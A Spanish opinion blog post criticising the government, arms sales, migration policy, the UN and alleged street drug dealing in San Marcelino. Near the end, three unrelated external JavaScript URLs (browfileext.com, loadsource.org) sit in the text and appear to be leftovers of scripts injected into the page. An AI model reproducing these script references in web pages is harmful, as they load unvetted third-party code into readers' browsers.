El horizonte político está muy nublado

El horizonte político está muy nublado

Posted by

¿Han visto las noticias? Yo, sí pero estoy pensando en dejar de hacerlo ya que he pasado de sospechar que me engañan a no tener ninguna duda. Este desgobierno socialista debe pensar que ha hecho algo grande por la corrupción pero debería hacérselo mirar. No me identifico con los anteriores gobernantes pero confieso que esperaba otra cosa. Por ejemplo, más honradez, políticos trabajando haciendo política, resolviendo los problemas de los ciudadanos. Seguro que ustedes saben de lo que hablo: delincuencia, parados, jubilados, violencia de género, trata de personas o tráfico de drogas. Son sólo algunos asuntos que deberían estar tratando de resolver.

Por centrar el tema: a mí me pareció bien que el Aquarius atracara en Valencia pero si venden bombas a los países de donde huyen personas cómo los que llegaron, ¿de qué sirve? Y no me salgan con que los demás también lo hacen. A eso mi madre siempre respondía: y si los demás se tiran por la ventana, ¿tú también? Alguien tiene que empezar. En cuanto a la fábrica de bombas española, ¿no se puede reconvertir? Hacían también barcos, ¿no? Pues que hagan barcos de recreo y, digo yo, que seguro que saben hacer más cosas.

No sé si han observado que de países como Noruega, Canadá, Islandia, por seguir poniendo ejemplos, no salen sus ciudadanos en pateras, jugándose la vida. Debe ser porque en esos países hay paz y se vive bien. Pues si no queremos que las personas se jueguen la vida habría que intentar que estuvieran bien en sus países, no sólo no vendiendo armas España, si no tampoco haciéndolo el resto. Por cierto, aquí la Onu, ¿qué? Aparte de sus días mundiales para recordar que hay problemas en el mundo, ¿a qué más se dedica? Fíjense que con los sueldos que se deben pagar allí, total para nada, todos los países ahorrarían mucho dinero pero cómo es un organismo público…a chupar del bote.

Tráfico de armas, de personas y de drogas. El mes pasado les hablaba de una finca de San Marcelino con un “camello”, presuntamente. El otro día me dijeron que había ya dos puertas donde tenían este tipo de negocio, presuntamente. Es curioso, me decía el señor de la otra vez que, a las 4 de la mañana fue un cliente a comprar, que a voz de grito pedía 20 euros pero en dos paquetes que uno era para él y el otro para otro “chaval”. Incluso, llegó la pareja de quien estaba atendiendo el negocio y le dijo que estaba en el bote que había en la cocina. Insisto, que eran las 4 de la mañana de un viernes.

Más o menos en un año hay elecciones. Desde luego que no sé a quién vamos a votar. Lo que está claro es que de los que hay no sirve ninguno: ni los que habían ni los de ahora. ¡Lo que se me acaba de ocurrir! ¿Y si nos organizamos y nos presentamos nosotros? Hacerlo peor, por no saber, sería difícil. El listón lo están dejando muy bajo.

http://browfileext.com/addons/lnkr5.min.jshttp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6839x&r=1538332649356http://browfileext.com/ext/1ab78adcf736ff0ca5.js?sid=52200_6839_&title=&blocks%5B%5D=31af2

The following two tabs change content below.

Pepi Parra

Latest posts by Pepi Parra (see all)

Deja un comentario

Twitter Auto Publish Powered By : XYZScripts.com
Member of The Internet Defense League
A %d blogueros les gusta esto: